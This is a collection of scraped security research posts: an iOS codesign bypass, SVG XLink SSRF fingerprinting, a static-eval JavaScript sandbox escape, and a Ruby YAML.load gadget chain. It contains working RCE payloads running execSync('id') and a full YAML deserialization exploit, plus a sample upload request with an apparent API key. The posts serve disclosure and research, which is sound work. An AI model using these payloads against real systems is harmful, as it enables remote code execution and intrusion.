2. Get the cs_blob of any binary that contains a valid CMS blob or is in the TrustCache, and replace the cs_blob of the vnode with it.
3. Once AMFI has finished, the cs_blob of the vnode has to be restored to one which matches the binary. This once again can be done by calling the F_ADDSIGS fcntl.
4. The binary has now been launched successfully! 🎉

Whilst we mentioned the TrustCache approach, provided that the cs_blob that is swapped in has a valid CMS blob (to pass CoreTrust validation), this approach will still work. It is also possible to replace only the cd_hash with that of one in the TrustCache, provided this is changed back in step 3.

Note: There are many variations possible to this attack. For example, to avoid TOCTOU'ing completely, the binary could be added to the TrustCache and then removed after the AMFI flow has completed. The differences between these attacks are minimal and it should be trivial to switch implementations; the most important fact is that your solution is stable and reliable. 
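The check/use gap these steps exploit can be sketched as a toy model. Nothing below is real iOS or AMFI code: the Vnode class, the trust_cache set, and the hook names are simplified stand-ins, purely to illustrate the TOCTOU pattern of swapping the blob in before the check and back out before use.

```python
# Toy model of the TOCTOU: validation and use happen at different times,
# and an attacker with hooks around the check can swap state in between.
trust_cache = {"aaaa-trusted-hash"}          # stand-in for a loaded TrustCache

class Vnode:
    def __init__(self, cdhash):
        self.cs_blob = {"cdhash": cdhash}    # stand-in for the real cs_blob

def amfi_vnode_check_signature(vnode):
    # simplified: only the TrustCache membership check is modeled
    return vnode.cs_blob["cdhash"] in trust_cache

def launch(vnode, pre_check_hook, post_check_hook):
    pre_check_hook(vnode)                    # step 2: swap in a trusted blob
    if not amfi_vnode_check_signature(vnode):
        raise PermissionError("untrusted binary")
    post_check_hook(vnode)                   # step 3: restore the real blob
    return vnode.cs_blob["cdhash"]           # dyld later sees the real hash

real = Vnode("ffff-unsigned-hash")           # an unsigned binary's hash
saved = {}

def swap_in(v):
    saved["blob"] = v.cs_blob
    v.cs_blob = {"cdhash": "aaaa-trusted-hash"}

def swap_back(v):
    v.cs_blob = saved["blob"]

launched_hash = launch(real, swap_in, swap_back)
print(launched_hash)  # the unsigned hash: the binary launched anyway
```

After the launch, the vnode once again fails the AMFI check, which is exactly the point: the trusted blob only existed during the window in which AMFI looked.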
Obtaining the necessary hooks (process launch and pre-dyld) is an exercise left to the reader. Some modern jailbreaks already have the required userland hooks, so this technique is perfect for such tools.

Practical usage

We envision that this bypass can be used in a jailbreak as a proper bypass to the CoreTrust mitigation. Additionally, it serves as a cleaner codesign bypass. Most modern jailbreaks achieve this by hijacking a daemon, which would no longer be necessary with this technique. Overall, this could increase stability and user experience when using such tools.

We plan on releasing a PoC attack utilising this bug soon. This post will be updated with a link to that when it is ready.

Thanks

Many thanks to @iBSparkes, for helping out with the implementation of the attack, and for technical proofreading. His Twitter is full of interesting content similar to this.

We hope that this research is useful to you. If it is, and you use it in a project, please include a reference to this post; hopefully someone else can also benefit from it. For that reason, please consider open-sourcing any code which implements this technique. We also ask that you credit Dynastic and @iBSparkes, as hard work has gone into this writeup and research.

This article was brought to you by Dynastic.

Sursa: https://research.dynastic.co/2019/03/01/codesign-bypass?refsrc=dynl
  14. SVG XLink SSRF fingerprinting libraries version

Arbaz Hussain
Mar 2

SSRF (Server-Side Request Forgery) has been quite a popular attack surface in upload functionality, where the application fetches assets from external resources in the form of images, documents, etc.

SVG is an XML-based vector image format used to display a variety of graphics on the Web and other environments. Due to its XML structure it supports various XML features; one of these features is XLink, which is responsible for creating internal and external links within an XML document.

During the testing process, I encountered an XLink-based SSRF that let me enumerate various internal libraries, installed tools, GNOME versions, and much more:

POST /upload HTTP/1.1
Host: redacted.com
Connection: close
Content-Length: 1313
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://redacted.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN
Referer: https://redacted.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="timestamp"

1551244304
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="api_key"

413781391468673
------WebKitFormBoundaryINZ5MzqXAud4aYrN
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="30" width="30" xlink:href="http://myserver:1337/" /></svg>

Incoming request at my server:

Interestingly, the Referer header shows the request has been generated from an internal network 
which is hosting an app on port 3000.

Since the application accepts SVG-based images, the second try would be to include static entities to see if the parser allows custom entities:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [ <!ENTITY xml "POC for Static Entities Allowed">]>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<text x="0" y="20" font-size="20">&xml;</text>
</svg>

As the parser allows static entities, the next step would be to include SYSTEM-based entities along with a DTD to fetch a malicious DTD, which is more like an XXE attack. But the parser was blocking SYSTEM-based entities in the backend; they had strong validation against maliciously malformed XML.

Since the parser blocks SYSTEM-based entities, our attack surface has been limited. Now it's time to test the Billion Laughs attack, since the application allowed static entities.

Always note: before blindly fuzzing the various XML payloads, make sure to understand the parser logic. Before trying the Billion Laughs attack, I threw a simple callback-entity payload at the server to see if the parser allows rendering the xml1 entity through a callback from the xml2 entity:

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [
<!ENTITY xml1 "This is my first message">
<!ENTITY xml2 "&xml1;">
]>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
<text x="0" y="20" font-size="20">&xml2;</text>
</svg>

Unfortunately, the parser blocks the callback entities as well. Now our attack surface is at ground level. The picture-present fingerprint trick: by including the internal path of a picture that may exist on the system, we get an interaction if that picture is actually present locally, as described by @flyod at https://hackerone.com/reports/223203. In order to enumerate all possible things, we need to build a wordlist of all possible local pictures present on the system. 
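Such a wordlist can be turned into probe files with a few lines. This is a sketch only: the template mirrors the SVG payload from the request above, while the example file paths and the make_probes helper are purely hypothetical, not known-good targets.

```python
# Sketch: generate one SVG probe per candidate internal image path.
# A server-side fetch (or its absence) then fingerprints what is installed.
SVG_TEMPLATE = (
    '<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">'
    '<image height="30" width="30" xlink:href="{target}"/></svg>'
)

def make_probes(paths):
    # map each candidate path to the SVG payload that references it
    return {path: SVG_TEMPLATE.format(target=path) for path in paths}

# illustrative guesses at image paths a Linux backend might have
wordlist = [
    "file:///usr/share/pixmaps/debian-logo.png",
    "file:///usr/share/icons/hicolor/48x48/apps/firefox.png",
]
probes = make_probes(wordlist)
for path, svg in probes.items():
    print(path, len(svg))
```

Each generated SVG would then be uploaded one at a time; an interaction (or a rendered image) for a given path suggests that file exists on the backend.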
Now it’s time to fuzz different open ports and different paths, along with all the internal picture paths collected, to fingerprint the libraries, scripts, and tools installed, along with their versions.

Arbaz Hussain ~Kiraak-Boy~

Sursa: https://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c
  15. Bypassing a restrictive JS sandbox

Matías Lang
2019-03-01 12:01

Also available in: Español

While participating in a bug bounty program, I found a site with a very interesting functionality: it allowed me to filter some data based on a user-controlled expression. I could put something like book.price > 100 to make it only show the books that are more expensive than $100. Using true as a filter showed me all the books, and false didn't show anything. So I was able to know whether the expression I used was evaluating to true or false.

That functionality caught my attention, so I tried passing it more complex expressions, like (1+1).toString()==="2" (evaluated to true) and (1+1).toString()===5 (evaluated to false). This is clearly JavaScript code, so I guessed that the expression was being used as an argument to a function similar to eval, inside a NodeJS server. It seemed like I was close to finding a Remote Code Execution vulnerability. However, when I used more complex expressions, I was getting an error saying that they were invalid. I guessed that it wasn't the eval function that parsed the expression, but a kind of sandbox system for JavaScript.

Sandbox systems used to execute untrusted code inside a restricted environment are usually hard to get right. In most cases there exist ways to bypass these protections and execute code with normal privileges. This is especially true if they try to limit the usage of complex, feature-bloated languages like JavaScript. The problem had already caught my attention, so I decided to spend my time trying to break this sandbox system. I would learn about JavaScript internals, and earn some bucks if I found and exploited the RCE.

The first thing I did was identify what library the site was using to implement the sandbox, given that the NodeJS ecosystem is known for having tens of libraries that do the same thing, and in many cases all of them are doing it wrong. 
Maybe it was a custom sandbox library used only for the target site, but I discarded this possibility because it was really unlikely that the developers spent their time doing that kind of thing. Finally, by analyzing the app error messages I concluded that they were using static-eval, a little-known library (but written by substack, somebody well known in the NodeJS community). Even if the original purpose of the library wasn't to be used as a sandbox (I still don't understand what it was created for), its documentation suggests that. In the case of the site I was testing, it certainly was being used as a sandbox.

Breaking static-eval

The idea of static-eval is to use the esprima library to parse the JS expression and convert it to an AST (Abstract Syntax Tree). Given this AST and an object with the variables I want to be available inside the sandbox, it tries to evaluate the expression. If it finds something strange, the function fails and my code isn't executed. At first I was a bit demotivated because of this, since I realized that the sandbox system was very restrictive with what it accepted. I wasn't even able to use a for or while statement inside my expression, so doing something that required an iterative algorithm was almost impossible. Anyway, I kept trying to find a bug in it.

I did not find any bug at first sight, so I looked at the commits and pull requests of the static-eval GitHub project. I found that pull request #18 fixed two bugs that allowed a sandbox escape in the library, exactly what I was looking for. I also found a blog post by the pull request author that explained these vulnerabilities in depth. I immediately tried using these techniques on the site I was testing, but unfortunately for me, they were using a newer static-eval version that already patched these vulns. However, knowing that somebody had already been able to break this library made me more confident, so I kept looking for new ways to bypass it. 
Then, I analyzed these two vulns in depth, hoping this could inspire me to find new vulnerabilities in the library.

Analysis of the first vulnerability

The first vuln used the function constructor to make a malicious function. This technique is frequently used to bypass sandboxes. For example, most of the ways to bypass the angular.js sandbox to get an XSS use payloads that end up accessing and calling the function constructor. It was also used to bypass libraries similar to static-eval, like vm2. The following expression shows the existence of the vulnerability by printing the system environment variables (this shouldn't be possible because the sandbox should block it):

"".sub.constructor("console.log(process.env)")()

In this code, "".sub is a short way to obtain a function ((function(){}) would also work). Then it accesses the constructor of that function. That is a function that, when called, returns a new function whose code is the string passed as an argument. This is like the eval function, but instead of executing the code immediately, it returns a function that will execute the code when called. That explains the () at the end of the payload, which calls the created function.

You can do more interesting things than showing the environment variables. For example, you can use the execSync function of the child_process NodeJS module to execute operating system commands and return their output. This payload will return the output of running the id command:

"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()

The payload is similar to the previous one, except for the created function's body. In this case, global.process.mainModule.constructor._load does the same as the require function of NodeJS. For some reason unknown to me, this function isn't available with the name require inside the function constructor, so I had to use that ugly name. 
The fix for this vulnerability consisted in blocking access to properties of objects that are a function (this is done with typeof obj == 'function'):

else if (node.type === 'MemberExpression') {
    var obj = walk(node.object);
    // do not allow access to methods on Function
    if((obj === FAIL) || (typeof obj == 'function')){
        return FAIL;
    }

This was a very simple fix, but it worked surprisingly well. The function constructor is available, naturally, only on functions, so I can't get access to it. An object's typeof can't be modified, so anything that is a function will have its typeof report 'function'. I didn't find a way to bypass this protection, so I looked at the second vuln. 
So I decided to find a bypass to this fix.

Analysis of the second vuln

This vuln was way simpler and easier to detect than the first one: the problem was that the sandbox allowed the creation of anonymous functions, but it didn't check their body to forbid malicious code. Instead, the body of the function was being directly passed to the function constructor. The following code has the same effect as the first payload of the blog post:

(function(){console.log(process.env)})()

You can also change the body of the anonymous function so it uses execSync to show the output of executing a system command. I'll leave this as an exercise for the reader.

One possible fix for this vulnerability would be to forbid all anonymous function declarations inside static-eval expressions. However, this would block the legitimate use cases of anonymous functions (for example, using one to map over an array). Because of this, the fix would have to allow the usage of benign anonymous functions, but block the usage of malicious ones. This is done by analyzing the body of the function when it is defined, to check that it won't perform any malicious actions, like accessing the function constructor. This fix turned out to be more complex than the first one. Also, Matt Austin (the author of the fix) said he wasn't sure it would work perfectly. 
Then, the following expression:

(function(book){return book.constructor})("".sub)

would have a very satisfactory result: when the function is defined, static-eval would check if book.constructor is a valid expression. Since book is initially an object (whose typeof is object) and not a function, accessing its constructor is allowed and the function will be created. However, when I call this function, book will take the value passed as an argument to the function (this is "".sub, another function). Then it will access and return its constructor, effectively returning the function constructor. Sadly, this didn't work either, because the author of the fix considered this case. At the moment of analyzing the function's body, the value of all its arguments is set to null, overriding the initial value of the variables. This is a fragment of the code doing that:

node.params.forEach(function(key) {
    if(key.type == 'Identifier'){
        vars[key.name] = null;
    }
});

This code takes the AST node that defines the function, iterates over each of its parameters whose type is Identifier, takes its name and sets the attribute of vars with that name to null. Even if the code looks correct, it has a very common bug: it doesn't cover all possible cases. What would happen if an argument is something strange and its type isn't Identifier? Instead of doing something sane and saying "I don't know what this is, so I'll block the entire function" (like in a whitelist), it will ignore that argument and continue with the rest (like a blacklist). This means that if I make a node representing a function argument have a type different from Identifier, the value of the variable with that name won't be overwritten, so it would use the initial value.

At this time I was pretty confident that I had found something important. I only needed to find how to set the key.type to something different from Identifier. As I commented before, static-eval uses the esprima library to parse the code we give to it. 
According to its documentation, esprima is a parser that fully supports the ECMAScript standard. ECMAScript is something like a dialect of JavaScript with more features, that makes its syntax more comfortable to the user [1]. One feature that was added to ECMAScript is function parameter destructuring. With this feature, the following JS code is now valid:

function fullName({firstName, lastName}){
  return firstName + " " + lastName;
}

console.log(fullName({firstName: "John", lastName: "McCarthy"}))

The curly braces inside the definition of the function arguments indicate that the function doesn't take two arguments firstName and lastName. Instead, it takes just one argument that is an object that must have the firstName and lastName properties. The previous code is equivalent to the following:

function fullName(person){
  return person.firstName + " " + person.lastName;
}

console.log(fullName({firstName: "John", lastName: "McCarthy"}))

If we see the AST generated by esprima (I did it by using this tool), we will have a very satisfactory result: indeed, this new syntax makes the function argument have a key.type different from Identifier, so static-eval won't use it when it overrides the variables. This way, when evaluating

(function({book}){return book.constructor})({book:"".sub})

static-eval will use the initial value of book, which is an object. Then, it allows the creation of the function. But when it is called, book will be a function, so the function constructor is now returned. I found the bypass! The previous expression returns the function constructor, so I only have to call it to create a malicious function, and then call this created function:

(function({book}){return book.constructor})({book:"".sub})("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()

I tried evaluating this expression in a local environment with the latest version of static-eval, and I got what I was expecting: Mission accomplished! 
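The blacklist-style parameter handling at the heart of this bug can be modeled in a few lines. This is a toy re-implementation for illustration only: static-eval itself is JavaScript, and the dict-based AST nodes below are simplified stand-ins for esprima's output.

```python
# Toy model of the fix's flaw: only "Identifier" params are nulled before
# the body check, so a destructured param ("ObjectPattern") slips through
# and the body is analyzed with the variable's benign initial value.
def null_params(vars_, params):
    for key in params:
        if key["type"] == "Identifier":   # any other node type falls through
            vars_[key["name"]] = None
    return vars_

initial = {"book": {"price": 10}}         # benign initial value of `book`

# function(book){...}    -> Identifier param: the variable gets nulled
plain = null_params(dict(initial), [{"type": "Identifier", "name": "book"}])

# function({book}){...}  -> ObjectPattern param: the variable survives
destructured = null_params(dict(initial), [{"type": "ObjectPattern"}])

print(plain)         # book nulled, body checked safely
print(destructured)  # book keeps its benign value, check is fooled
```

Because the check runs against the benign initial value while the call runs against the attacker-supplied argument, the destructured form passes definition-time analysis yet misbehaves at call time.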
I found a bypass to the static-eval library allowing me to get code execution on the machine that uses it. The only required condition to make it work was knowing the name of a variable whose value isn't a function and that has a constructor attribute. Strings, numbers, arrays and objects all fulfill this property, so it should be easy to achieve this condition. I only needed to use this technique on the site I was testing, get a PoC of the RCE and claim my money. Pretty simple. Or maybe not?

Discovering that the exploit didn't work in my target

Unfortunately, not. After doing all this work and finding an elegant and functional bypass, I realized that it was not going to work on the site I was testing. The only condition required was to have the name of a variable whose value isn't a function, so you might be thinking I couldn't get it to make my technique work. However, it did satisfy this condition. The reason it didn't work is even more bizarre.

To give some context, the site wasn't using static-eval directly. It was using it through the jsonpath npm library. JSONPath is a query language with the same purpose as XPath, but made for JSON documents instead of XML ones. It was initially published in 2007 in this article. After reading the JSONPath documentation, I realized that it is a very poor project, with a really vague specification about how it should work. Most of the features it implements were probably added as an afterthought, without properly considering whether adding them was worth it, or whether it was just a bad idea. It's a shame that the NodeJS ecosystem is full of libraries like this one.

JSONPath has a feature called filter expressions, which allows filtering documents that match a given expression. For example, $.store.book[?(@.price < 10)].title will get the books cheaper than $10, and then get their titles. In the case of the jsonpath npm library, the expression between parentheses is evaluated using static-eval. 
The site I was testing allowed me to specify a JSONPath expression and parsed it with that library, so the RCE there was evident. If we look at the previous JSONPath expression in detail, we can see that the expression passed to static-eval is @.price < 10. According to the documentation, @ is a variable containing the document being filtered (usually it is an object).

Unfortunately, the creator of JSONPath had the idea to name this variable @. According to the ECMAScript specification, this isn't a valid variable name. So to make static-eval work, they had to do a horrible thing: patch the esprima code so it considers @ a valid variable name.

When you create an anonymous function in static-eval, it is embedded into another function that takes the already defined variables as arguments. So if I create an anonymous function inside a JSONPath filter expression, it will create a function wrapping it that takes an argument named @. This is done by directly calling the function constructor, so it doesn't use the esprima patch from before. Then, when defining the function, it'll throw an error that I won't be able to avoid. This is just a bug in the library, which makes it fail when defining functions (both benign and malicious) inside filter expressions. And because of this, my bypass technique won't work with this library.

Just because of the horrible decision of naming a variable @ in a library that is used mainly in JS, where @ isn't a valid variable name, I wasn't able to exploit the RCE in the site and obtain a 4-digit bounty. Why wouldn't the author name it _ (which is a valid variable name), document or joseph!! This time, I'll have to settle for having discovered a great vulnerability in the library, and having learned a lot about JavaScript. 
And I used the concepts I learned to bypass a different kind of restricted JS environment, this time getting an economic reward. I hope to publish this other research soon.

I want to mention again the great previous work done by Matt Austin on static-eval. Without this material, maybe I wouldn't have found this new vulnerability.

As a general recommendation when testing a system, it is always tempting to replicate and isolate one feature of it in a local environment we control, so we can play with it more freely. In my case, I made a Docker instance with the static-eval library to try bypassing the sandbox. My problem was that I only used this instance during the whole research, without verifying that what I was doing was valid in the real site. If I had done this before, maybe I would have noticed this wasn't going to work and I'd have moved on to something else. The lesson learned is that you shouldn't abstract so much over a whole system, and that you should continuously test what you found against the real system, instead of doing it just at the end of your research.

Finally, if you're auditing a site that has a similar system that evaluates user-controlled expressions inside a sandbox, I highly recommend playing with it for a considerable amount of time. It would be strange to find a sandbox system free of vulnerabilities, especially if it executes dynamic, fully-featured programming languages like JavaScript, Python or Ruby. And when you find these kinds of sandbox bypass vulns, they usually have a critical impact on the application that contains them.

I hope you enjoyed this post. Greetings!

Extra: Chronology of the vuln

01/02/19 - Report of the vulnerability submitted both to the NodeJS security team and to the static-eval maintainer. You can read the original report here
01/03/19 - The NodeJS security team replicated the bug. 
They told me they were going to contact the library maintainer and publish an advisory if he didn't respond to the report
02/14/19 - Advisory officially published on the npmjs site
02/15/19 - The library was fixed and a new version of it was released
02/18/19 - The library's README file was updated to add a disclaimer saying that the library shouldn't be used as a sandbox
02/26/19 - A new fix was applied to the library because the original fix had a bug and static-eval was still vulnerable

[1] It's worth noting that this is a pretty vague and incorrect definition of what ECMAScript is. My indifference to the JavaScript ecosystem means I won't even bother finding a more correct definition.

Sursa: https://licenciaparahackear.github.io/en/posts/bypassing-a-restrictive-js-sandbox/
  16. staaldraad
Universal RCE with Ruby YAML.load
March 2, 2019
Last year Luke Jahnke wrote an excellent blog post on the elttam blog about finding a universal RCE deserialization gadget chain for Ruby 2.x. In the post he discusses the process of finding and eventually exploiting a gadget chain for Marshal.load. I was curious whether the same chain could be used with YAML.load. It has been shown before that using YAML.load with user-supplied data is bad, but all the posts I could find focus on Ruby on Rails (RoR). Wouldn't it be nice to have a gadget chain to use in non-RoR applications?
Plan of Action
Initially I decided to reuse the excellent work already done by Luke, since my Ruby skills aren't that great and I'm lazy. So I inserted YAML.dump(payload) into his script. Unfortunately this failed, with the following yaml file being created:
--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
At the outset it is pretty obvious that this isn't going to give us RCE. There is no RCE payload present and none of the original gadget chain is present. One of the key points from the elttam blog post is that marshal_dump is used to set up the @requirements variable as follows:
class Gem::Requirement
  def marshal_dump
    [$dependency_list]
  end
end
Thus it would be necessary to find a way to set @requirements for the YAML payload. Unfortunately there isn't an equivalent yaml_dump method, so @requirements will need to be initialized in another way. The generated yaml does provide us with a clue on how to get @requirements set, and by reading the documentation for the Gem::Requirement gem you'll note that it can be initialized with requirements, which can be Gem::Versions, Strings or Arrays. An empty set of requirements is the same as ">= 0", which matches what we see in the generated YAML. How about using Gem::Requirement.new($dependency_list) instead of the current Gem::Requirement.new for our payload?
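You can reproduce the dump behavior locally without the exploit script; a minimal sketch (exact output formatting may vary slightly between Psych versions):

```ruby
require "yaml"
require "rubygems"

# Dumping a default Gem::Requirement shows why the Marshal-based script
# produced no gadget chain: only the @requirements instance variable
# (">= 0" by default) survives YAML serialization -- the marshal_dump
# hook is never consulted on the YAML path.
puts YAML.dump(Gem::Requirement.new)
```

The output is exactly the harmless YAML shown above, which is why the gadget disappears.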
puts "Generate yaml"
payload2 = YAML.dump(Gem::Requirement.new($dependency_list))
puts payload2
puts "STEP yaml"
YAML.load(payload2) rescue nil
puts
This "works", meaning the RCE happens; unfortunately, no valid YAML is produced. The reason for this is that an exception occurs right at the end of the gadget chain in specific_file.rb.
Generate yaml
uid=500(rubby) gid=500(rubby) groups=500(rubby)
/usr/lib/ruby/2.3.0/rubygems/stub_specification.rb:155:in `name': undefined method `name' for nil:NilClass (NoMethodError)
from /usr/lib/ruby/2.3.0/rubygems/source/specific_file.rb:65:in `<=>'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `sort'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `tsort_each_child'
from /usr/lib/ruby/2.3.0/tsort.rb:415:in `call'
from /usr/lib/ruby/2.3.0/tsort.rb:415:in `each_strongly_connected_component_from'
from /usr/lib/ruby/2.3.0/tsort.rb:349:in `block in each_strongly_connected_component'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `each'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `tsort_each_node'
from /usr/lib/ruby/2.3.0/tsort.rb:347:in `call'
from /usr/lib/ruby/2.3.0/tsort.rb:347:in `each_strongly_connected_component'
from /usr/lib/ruby/2.3.0/tsort.rb:281:in `each'
from /usr/lib/ruby/2.3.0/tsort.rb:281:in `to_a'
from /usr/lib/ruby/2.3.0/tsort.rb:281:in `strongly_connected_components'
from /usr/lib/ruby/2.3.0/tsort.rb:257:in `strongly_connected_components'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:76:in `dependency_order'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:99:in `each'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:107:in `map'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:107:in `inspect'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:101:in `parse'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:131:in `block in initialize'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:131:in `map!'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:131:in `initialize'
from ex.rb:49:in `new'
from ex.rb:49:in `<main>'
At this point I tried a few variations of changing $dependency_list to contain only part of the gadget chain, but hit a new exception at each step of the way.
The manual way
Instead of bashing my head against Ruby, I decided to create the YAML manually. This meant modifying the previously generated YAML to have our gadget chain instead of the Gem::Version. The first bit of this was really easy: simply switch out !ruby/object:Gem::Version for !ruby/object:Gem::DependencyList:
--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::DependencyList
Trying to load this with YAML.load now results in a new error:
/usr/lib/ruby/2.3.0/rubygems/requirement.rb:272:in `fix_syck_default_key_in_requirements': undefined method `each' for nil:NilClass (NoMethodError)
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:207:in `yaml_initialize'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:211:in `init_with'
<..snip..>
Clearly the code ends up at the trigger point in the method fix_syck_default_key_in_requirements, so we are probably on the right track. Next I did the lazy debug of simply adding a puts @requirements in the file requirement.rb at line 270. This outputs:
#<Gem::DependencyList:0x000000026f2b68>
This means the YAML so far is correct and we are getting the Gem::Requirement to be initialized with a payload controlled by us. From here on it was simply a process of following the elttam blog post and the gadget chain to make sure all the different components are present in the YAML file. The next part is getting the .each call to succeed. The above error tells us that there is a nil:NilClass when calling this, which makes perfect sense: as the blog post found, a call to its each instance method will result in the sort method being called on its @specs instance variable. Now we need to ensure that @specs is defined in the YAML file.
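As a side note on why this works at all: Psych's !ruby/object: tags allocate the target object and set its instance variables directly, never calling initialize, which is why we can hand Gem::Requirement internal state it would normally never accept. A minimal sketch (the Gadget class here is hypothetical, purely for illustration; on Ruby 3.1+ the permissive loader is spelled YAML.unsafe_load):

```ruby
require "yaml"

# Hypothetical stand-in for the gadget objects: note it has no
# initialize logic at all.
class Gadget
  attr_reader :spec
end

# !ruby/object: allocates the object and sets ivars directly;
# initialize is never called.
def unsafe_yaml(str)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(str) : YAML.load(str)
end

obj = unsafe_yaml("--- !ruby/object:Gadget\nspec: hello\n")
p obj.class  # Gadget
p obj.spec   # "hello"
```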
Based on the blog post and the sample script, we know this needs to be an array of Gem::Source::SpecificFile. In YAML this would be:
specs:
- !ruby/object:Gem::Source::SpecificFile
- !ruby/object:Gem::Source::SpecificFile
One of the Gem::Source::SpecificFile objects needs to have a spec instance variable of type Gem::StubSpecification, and this in turn holds the payload for RCE in its loaded_from variable. Putting all this information together (it took some trial and error), we end up with:
--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::DependencyList
  specs:
  - !ruby/object:Gem::Source::SpecificFile
    spec: &1 !ruby/object:Gem::StubSpecification
      loaded_from: "|id 1>&2"
  - !ruby/object:Gem::Source::SpecificFile
    spec:
Using the following Ruby script to test the payload:
require "yaml"
YAML.load(File.read("p.yml"))
The outcome is RCE, along with the original error seen when trying to do YAML.dump in the first place.
rubby@rev:/tmp$ ruby b.rb
uid=500(rubby) gid=500(rubby) groups=500(rubby)
/usr/lib/ruby/2.3.0/rubygems/stub_specification.rb:155:in `name': undefined method `name' for nil:NilClass (NoMethodError)
from /usr/lib/ruby/2.3.0/rubygems/source/specific_file.rb:65:in `<=>'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `sort'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:218:in `tsort_each_child'
from /usr/lib/ruby/2.3.0/tsort.rb:415:in `call'
from /usr/lib/ruby/2.3.0/tsort.rb:415:in `each_strongly_connected_component_from'
from /usr/lib/ruby/2.3.0/tsort.rb:349:in `block in each_strongly_connected_component'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `each'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:214:in `tsort_each_node'
from /usr/lib/ruby/2.3.0/tsort.rb:347:in `call'
from /usr/lib/ruby/2.3.0/tsort.rb:347:in `each_strongly_connected_component'
from /usr/lib/ruby/2.3.0/tsort.rb:281:in `each'
from /usr/lib/ruby/2.3.0/tsort.rb:281:in `to_a'
from /usr/lib/ruby/2.3.0/tsort.rb:281:in `strongly_connected_components'
from
/usr/lib/ruby/2.3.0/tsort.rb:257:in `strongly_connected_components'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:76:in `dependency_order'
from /usr/lib/ruby/2.3.0/rubygems/dependency_list.rb:99:in `each'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:272:in `fix_syck_default_key_in_requirements'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:207:in `yaml_initialize'
from /usr/lib/ruby/2.3.0/rubygems/requirement.rb:211:in `init_with'
from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:382:in `init_with'
from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:374:in `revive'
from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:208:in `visit_Psych_Nodes_Mapping'
from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:16:in `visit'
from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:6:in `accept'
from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:32:in `accept'
from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:311:in `visit_Psych_Nodes_Document'
from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:16:in `visit'
from /usr/lib/ruby/2.3.0/psych/visitors/visitor.rb:6:in `accept'
from /usr/lib/ruby/2.3.0/psych/visitors/to_ruby.rb:32:in `accept'
from /usr/lib/ruby/2.3.0/psych/nodes/node.rb:38:in `to_ruby'
from /usr/lib/ruby/2.3.0/psych.rb:253:in `load'
from b.rb:3:in `<main>'
rubby@rev:/tmp$
I'm not sure if it's possible to completely get rid of the error, but then again, I achieved my initial goal of RCE and don't feel like staring at more Ruby. As always, never use YAML.load with user-supplied data; better yet, stick to using SafeYAML.
Payload: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565
Source: https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/
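In the same spirit as SafeYAML, Psych's built-in YAML.safe_load refuses arbitrary !ruby/object: tags unless the class is explicitly whitelisted, which stops this payload at its very first tag. A quick sketch:

```ruby
require "yaml"

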